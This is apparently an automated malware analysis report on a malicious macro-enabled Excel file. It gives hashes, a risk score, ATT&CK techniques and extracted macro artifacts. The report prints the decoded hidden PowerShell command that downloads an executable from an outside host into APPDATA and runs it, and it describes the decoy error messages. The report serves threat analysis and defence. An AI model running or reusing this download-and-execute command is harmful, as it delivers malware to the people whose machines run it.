Office (OOXML) / .XLSM malware analysis — malicious · 4e6e3f83a3a2be86

MALICIOUS

Office (OOXML) / .XLSM

47.8 KB Created: 2021-11-17 02:06:11 UTC Authoring application: Microsoft Excel 15.0300

MD5: 7fd22cdd775e68e4a9c5936f88e66005 SHA-1: 43f5299aba24a6237b6fa23719f5df18364bb102 SHA-256: 4e6e3f83a3a2be86a9e2ce6ee9397ef59d30fdc6d2661ffbc50e0053cc670a4b

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File

The critical heuristic OLE_VBA_SHELL indicates that the VBA macro executes a command using Shell(). The VBA script reconstructs a PowerShell command that downloads a file named 'jogb.exe' from 'http://ddl8.data.hu/get/283078/131252545/jogb.exe' and saves it as 'Mvfxbtw.exe' in the APPDATA directory, then executes it. The document body displays fake error messages to mask the malicious activity. The reconstructed PowerShell command is: powershell -nop -w hidden -c "IEX (New-Object System.Net.WebClient).DownloadFile('http://ddl8.data.hu/get/283078/131252545/jogb.exe', '$env:APPDATA\Mvfxbtw.exe') ; Start-Process ($env:APPDATA\Mvfxbtw.exe)". The script also creates and executes a batch file named 'tsthmltijsrxpqhupoz.bat'.

Heuristics 2

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
VBA project inside OOXML medium OOXML_VBA

Document contains vbaProject.bin — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `c5b6b05c2259ebfacb3dff10ab45fae7a3ab700306091f9ddc5099e0f0a0f330`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2408 bytes
`vbaProject_00.bin` `04c55024adf67063227be5afb4d9b4a287c6878c07d27c4573215ffa51cec311`	vba-project	OOXML VBA project: xl/vbaProject.bin	6144 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.